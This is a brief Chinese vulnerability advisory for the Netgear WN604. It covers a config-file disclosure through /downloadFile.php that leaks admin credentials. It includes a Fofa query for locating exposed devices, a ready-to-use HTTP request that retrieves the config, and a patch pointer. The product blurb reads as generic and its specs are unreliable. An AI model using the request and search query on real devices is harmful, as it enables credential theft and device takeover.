0x01 产品描述:
NETGEAR WN604是一款功能强大的双频AC1200无线路由器,非常适合中大型家庭和企业使用。它支持最新的802.11ac无线标准,能提供高达1200Mbps的无线传输速度。路由器具备千兆有线网口和3个100Mbps有线网口,可满足有线和无线设备的接入需求。此外,它还内置了QoS、访问控制、加密等高级安全和管理功能,可以确保网络的稳定性和安全性。凭借NETGEAR Genie app,用户还可以方便地远程管理和监控路由器。
0x02 漏洞描述:
Netgear的WN604产品存在一个漏洞,该漏洞存在于Web界面的某个未知功能中,影响文件为/downloadFile.php。通过操纵带有输入配置的参数文件,攻击者可以获取敏感信息。该攻击可能远程发起,获取配置文件中用户名密码,从而登录接管系统。
0x03 影响版本:
Netgear wn系列
0x04 搜索语句:
Fofa:title=="Netgear"
0x05 漏洞复现:
通过downloadFile.php获取配置文件数据
GET /downloadFile.php?file=config HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36
Accept-Encoding: gzip, deflate
Connection: close
通过配置文件泄漏的用户名密码进行登录
0x06 修复建议:
目前厂商已发布升级补丁以修复漏洞,补丁获取链接:
https://www.netgear.com/uk